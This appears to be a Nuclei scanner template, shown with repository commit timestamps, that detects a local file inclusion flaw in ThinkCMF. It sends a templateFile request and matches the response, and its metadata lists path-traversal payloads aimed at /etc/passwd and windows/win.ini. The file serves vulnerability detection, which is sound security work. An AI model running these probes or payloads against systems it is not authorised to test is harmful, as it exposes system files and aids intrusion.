nuclei-templates/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml

39 lines
885 B
YAML
Raw Normal View History

2021-02-11 15:46:20 +00:00
id: thinkcmf-lfi
info:
name: ThinkCMF - Local File Inclusion
2021-02-11 15:46:20 +00:00
author: pikpikcu
severity: high
description: ThinkCMF is vulnerable to local file inclusion.
reference:
- https://www.freebuf.com/vuls/217586.html
2021-09-30 14:52:53 +00:00
metadata:
win-payload: ../../../../../../../../../../../../../../../../windows/win.ini
unix-payload: ../../../../../../../../../../../../../../../../etc/passwd
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: thinkcmf,lfi
2021-02-11 15:46:20 +00:00
requests:
- method: GET
path:
2021-09-30 14:52:53 +00:00
- "{{BaseURL}}/?a=display&templateFile=README.md"
2021-02-11 15:46:20 +00:00
matchers-condition: and
matchers:
2021-02-12 04:59:05 +00:00
2021-09-30 14:52:53 +00:00
- type: word
condition: and
words:
- "ThinkCMF"
- "## README"
- "## UPDATE"
2021-02-11 15:46:20 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/08/05